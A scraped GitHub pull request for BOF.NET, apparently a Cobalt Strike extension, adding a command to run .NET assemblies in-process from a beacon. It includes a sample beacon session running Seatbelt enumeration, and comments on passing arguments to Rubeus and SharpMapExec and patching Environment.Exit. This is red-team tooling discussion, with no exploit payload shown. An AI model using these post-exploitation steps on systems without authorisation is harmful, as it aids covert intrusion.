8000 Added bofnet_executeassembly for calling entry point on standard .NET assemblies by williamknows · Pull Request #1 · CCob/BOF.NET · GitHub
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

Added bofnet_executeassembly for calling entry point on standard .NET assemblies #1

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 14 commits into
base: main
Choose a base branch
from
Open

Added bofnet_executeassembly for calling entry point on standard .NET assemblies #1

wants to merge 14 commits into from

Conversation

williamknows
Copy link

Adds bofnet_executeassembly function to execute standard .NET assemblies in-process through BOF.NET. Arguments can be optionally supplied.

Console output is captured in a memory stream then returned through BeaconConsole.WriteLine().

Thanks for the tip on Twitter for getting this working!

Example Command Sequence

bofnet_init
bofnet_load /path/to/assembly.exe
bofnet_listassemblies
bofnet_executeassembly AssemblyName argument1 argument2

Example with Seatbelt

beacon> bofnet_init
[*] Initializing BOFNET
[+] host called home, sent: 488097 bytes
[+] received output:
[+] BOFNET Runtime Initalized, assembly size 481280, .NET Runtime Version: 4.0.30319.42000 in AppDomain BOFNET

beacon> bofnet_load /mnt/hgfs/Shared/Seatbelt/Seatbelt/bin/Release/Seatbelt.exe
[*] Attempting to load large .NET assembly /mnt/hgfs/Shared/Seatbelt/Seatbelt/bin/Release/Seatbelt.exe into BOFNET
[+] host called home, sent: 554690 bytes
[+] received output:
[+] Setting up new loader with unique id 9OfYojDS
[+] Loaded assembly Seatbelt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null successfully

beacon> bofnet_listassemblies
[*] Listing loaded BOFNET assemblies
[+] host called home, sent: 6820 bytes
[+] received output:
BOFNET: BOFNET, Version=1.0.1.0, Culture=neutral, PublicKeyToken=null
Seatbelt: Seatbelt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null

beacon> bofnet_executeassembly Seatbelt WindowsFirewall
[*] Execute a standard .NET assembly
[+] host called home, sent: 6848 bytes
[+] received output:


                        %&&@@@&&                                                                                  
                        &&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%                         
                        &%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
%%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((
#%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((
#%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((
#####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((
#######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####
###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####
#####%######################  %%%..                       @////(((&%%%%%%%################                        
                        &%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*                         
                        &%%&&&%%%%%        v1.1.1         ,(((&%%%%%%%%%%%%%%%%%,                                 
                         #%%%%##,                                                                                 


====== WindowsFirewall ======

Collecting Windows Firewall Non-standard Rules


Location                     : SOFTWARE\Policies\Microsoft\WindowsFirewall

Location                     : SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy

Domain Profile
    Enabled                  : True
    DisableNotifications     : False
    DefaultInboundAction     : ALLOW
    DefaultOutboundAction    : ALLOW

Public Profile
    Enabled                  : True
    DisableNotifications     : False
    DefaultInboundAction     : ALLOW
    DefaultOutboundAction    : ALLOW

Standard Profile
    Enabled                  : True
    DisableNotifications     : False
    DefaultInboundAction     : ALLOW
    DefaultOutboundAction    : ALLOW



[*] Completed collection in 0.056 seconds

@ogue
Copy link
ogue commented Aug 11, 2021

Is this going to be merged soon ?

@CCob
Copy link
Owner
CCob commented Aug 11, 2021

Is this going to be merged soon ?

Sorry, I cannot merge this as it conflicts with an internal version we have of the same BOF but implemented differently.

@NotoriousRebel
Copy link

Thanks for this awesome PR, I have noticed that depending on how args are passed something under the hood fails to properly parse the args and pass them to the .NET assembly being invoked which causes the program to crash. For example, with Seatbelt: -group=all -full, Rubeus commands, SharpMapExec, etc... this leads to the user having to hardcode their arguments which is not ideal. I believe the problem stems from how arguments are parsed within the aggressor script. Perhaps it would be more practical to parse arguments based on IEA's aggressor script which handles more sophisticated arguments correctly.

@NotoriousRebel
Copy link

@williamknows Have you had a chance to look? I am going to attempt to modify the aggressor script some time to fix this issue but wasn't sure if you already have.

@williamknows
Copy link
Author
williamknows commented Sep 16, 2021
edited
Loading

Hey, sorry for the slow reply, only realised today when I saw this thread pop up on Slack.

To test this, I wrote a quick assembly that just prints the arguments. As shown below, they make it through fine:

image

I suspect there's a few different issues here.

For SeatBelt, given the arguments above work, I think it's just that that particular command takes: (1) a long time to execute when doing the full enumeration (often > 5 minutes); (2) it generates a huge amount of data to send back, which takes a while to filter back (e.g., check the memory usage which rapidly rises to > 100MB).

The fact that bofnet_executeassembly hangs until completion I think could be a false indicator that it's died, but really it hasn't. I'll probably look into trying a bofnet_job implementation soon (although hopefully CCob will release the internal code before ;) ).

For Rubeus and SharpMapExec I'm honestly not so sure. Do you have any example commands? I know they both have some Environment.Exit() calls which may be the root of the issue.

For this I've just pushed functionality for a bofnet_patchexit command which uses MDSec' approach they documented a while ago (see here). This may fix it, let me know if not.

Note that this now compiles BOF.NET with the /unsafe flag which may introduce other issues. At some point I'll try and re-write that too.

@williamknows
Copy link
Author

Just pushed a bofnet_jobassembly implementation for background assembly execution. @NotoriousRebel give this a try. It's a nicer approach, as apart from not blocking during execution, if you run bofnet_jobs you can see if it's still running (Active: True). It also follows the standard bofnet_job approach of being able to return console output during execution.

It's limited to one assembly at a time due to the way it's capturing standard output. Capturing on a per assembly basis is possible, but the code requires a lot more thought. You can still run standard bofnet_job(s) in parallel though.

@CCob I've left this open in case anyone finds it useful until your implementation hits the public code, but if you want to close it, certainly no drama from me. Thanks again for the awesome project.

@CCob
Copy link
Owner
CCob commented Sep 19, 2021

Great stuff. I will leave it open for others to take advantage of the PR.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
5 participants
@williamknows @ogue @CCob @NotoriousRebel @EspressoCake
0